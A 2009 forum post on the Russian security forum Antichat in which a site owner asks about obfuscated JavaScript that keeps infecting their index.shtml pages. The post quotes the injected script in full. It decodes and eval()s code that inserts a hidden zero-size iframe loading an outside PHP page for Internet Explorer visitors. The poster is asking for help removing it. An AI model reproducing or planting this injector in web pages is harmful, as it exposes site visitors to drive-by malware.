ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность > *nix
   
 
 
Опции темы Поиск в этой теме Опции просмотра

java script injection
  #1  
Старый 25.09.2009, 13:53
Аватар для Ex@rcist
Ex@rcist
Новичок
Регистрация: 04.09.2009
Сообщений: 23
Провел на форуме:
68004

Репутация: 10
Wink java script injection

Кто нибудь встречался с такой заразой:

Код:
### script#/**/function ZqPT(wzs1, VGc0, RWf3) { var UuY0; UuY0=wzs1.split(VGc0); var Bub0=UuY0.join(RWf3); return Bub0;/**/ } function Zvc0(unY0) { unY0 = ZqPT(unY0,"##+##","'"); unY0 = ZqPT(unY0,"##|##","\\"); Bub0=""; yxa6 =""; for(k=0;k<unY0.length;k++) { Bub0 = unY0.charCodeAt(k); if (Bub0==32){Bub0=35} else if (Bub0==35){Bub0=32} else if (Bub0==59){Bub0=64} else if (Bub0==64){Bub0=59} else if (Bub0==37){Bub0=42} else if (Bub0==42){Bub0=37} else if (Bub0>=97 && Bub0<=122) { Bub0=Bub0-97;Bub0=25-Bub0;Bub0+=97; }else if (Bub0>=65 && Bub0<=90) { Bub0=Bub0-65;Bub0=25-Bub0;Bub0+=65; }else if (Bub0>=48 && Bub0<=57) { Bub0=Bub0-48;Bub0=9-Bub0;Bub0+=48; } yxa6 += String.fromCharCode(Bub0); } return yxa6;/**/ }ZPd6=eval;var ZCi1;var osi4;var Eyik;var boMZ;var Mik1;var EnB4;var Csm4;ZPd6(Zvc0('VmY5#=###+##sggk://svczglny.xln/urovh/a/hgzgrx.ksk##+##@Nrp8#=###+##ruiznv##+##@'));ZPd6(Zvc0('AXr8#=#wlxfnvmg.xivzgvVovnvmg(Nrp8)@AXr8.hvgZggiryfgv(##+##hix##+##,#VmY5)@'));ZPd6(Zvc0('AXr8.hvgZggiryfgv(##+##drwgs##+##,9)@AXr8.hvgZggiryfgv(##+##svrtsg##+##,9)@AXr8.hvgZggiryfgv(##+##yliwvi##+##,9)@'));ZPd6(Zvc0('AXr8.hvgZggiryfgv(##+##hgbov##+##,##+##drwgs:#9@#svrtsg:#9@#yliwvi:#mlmv@##+##)@'));ZPd6(Zvc0('AXr8.hvgZggiryfgv(##+##hgbov##+##,##+##wrhkozb:mlmv##+##)@#Xhn5=mzertzgli.fhviZtvmg.glOldviXzhv()@'));ZPd6(Zvc0('Vbrp=Xhn5.rmwvcLu(##+##nhrv##+##)@lhr5=Xhn5.rmwvcLu(##+##nhrv#1##+##)@ylNA=Xhn5.rmwvcLu(##+##mg#3##+##)@'));if ((osi4==-1)&&(Eyik>0)&&(boMZ==-1)){ZPd6(Zvc0('wlxfnvmg.ylwb.zkkvmwXsrow(AXr8)@'));}/script>
делает инъекцию кода, который от страницы к странице мутирует.

Проблема вероятно не на стороне клиента делающего ftp конект ибо:

-rw-rw-rw- 1 apache apache 64307 Sep 25 02:16 index.shtml - файло заражается от от имени апаче.

Последний раз редактировалось Ex@rcist; 25.09.2009 в 14:35..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Куча скриптов =)) SK | Heaton PHP, PERL, MySQL, JavaScript 37 01.02.2008 15:23
Java Script Including ?? Adio Чаты 12 08.06.2006 19:44
Pубрика "Полезные решения на PHP" Utochka PHP, PERL, MySQL, JavaScript 28 23.05.2006 10:06
Возможности Java Script Razial Чаты 8 10.01.2006 18:17
Словарь Java-терминов foreva Чужие Статьи 0 08.02.2005 16:28



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ